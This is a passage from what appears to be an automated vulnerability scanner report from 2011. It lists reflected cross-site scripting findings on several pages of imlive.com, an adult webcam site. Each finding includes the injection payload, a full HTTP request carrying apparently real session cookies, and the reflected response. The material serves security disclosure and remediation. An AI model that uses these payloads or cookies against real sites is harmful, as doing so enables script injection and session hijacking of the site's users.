<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.116. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/sex-video-features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 32222 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.117. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:06 GMT Connection: close Content-Length: 92716 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.118. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/shemale-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:34 GMT Connection: close Content-Length: 92559 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1"> ...[SNIP]...
2.119. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:15 GMT Connection: close Content-Length: 224539 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1"> ...[SNIP]...
2.120. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/shemale/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:31 GMT Connection: close Content-Length: 224765 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.121. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:23 GMT Connection: close Content-Length: 171425 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1"> ...[SNIP]...
2.122. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/shy-girl/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:40 GMT Connection: close Content-Length: 171563 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.123. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /liveexperts.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:10 GMT Connection: close Content-Length: 19420 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'> ...[SNIP]...
2.124. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /localcompanionship.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
